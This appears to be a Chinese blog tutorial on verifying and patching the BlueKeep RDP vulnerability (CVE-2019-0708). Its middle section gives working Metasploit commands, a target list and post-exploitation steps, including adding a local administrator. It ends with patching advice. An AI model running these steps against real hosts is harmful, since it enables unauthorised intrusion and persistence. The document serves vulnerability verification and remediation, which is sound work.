CVE-2019-0708 Microsoft RDP RCE漏洞验证及修复方法
一、简介及漏洞危害
Windows被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏。
1、影响范围
2、Nessus检测出有漏洞的主机
二、准备攻击利用
1、使用Kali Linux,启动MSF
# msfconsole
然后在Kali终端输入命令msfconsole以启动msf,如图所示:
2、开始攻击利用
接下来就可以开始进行目标机的攻击了
分别输入命令:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.26.127
set target 2
exploit
解释:
其中rhosts为目标机IP,target设置为2,可用show targets 查看对应ID,exploit表示开始攻击。
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
Exploit targets:
Id Name
— —-
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – Virtualbox 6)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – VMWare 14)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – VMWare 15)
5 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – VMWare 15.1)
6 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – Hyper-V)
7 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – AWS)
8 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – QEMU/KVM)
利用过程截图
3、攻击利用成功
返回 meterpreter > 提示,说明已经攻击利用成功,可以查看IP、文件,或利用net user 添加本地管理员权限,使用RDP登录,以前其它操作。
三、漏洞修复:
1、使用系统自带的windows update补丁更新服务,更新微软漏洞补丁(慢);
2、使用360 、腾讯管家等工具修复漏洞(建议);
如长期未更新过,可能需要更新完、重启、再更新、再重启,操作多次,因为有些补丁有依赖关系。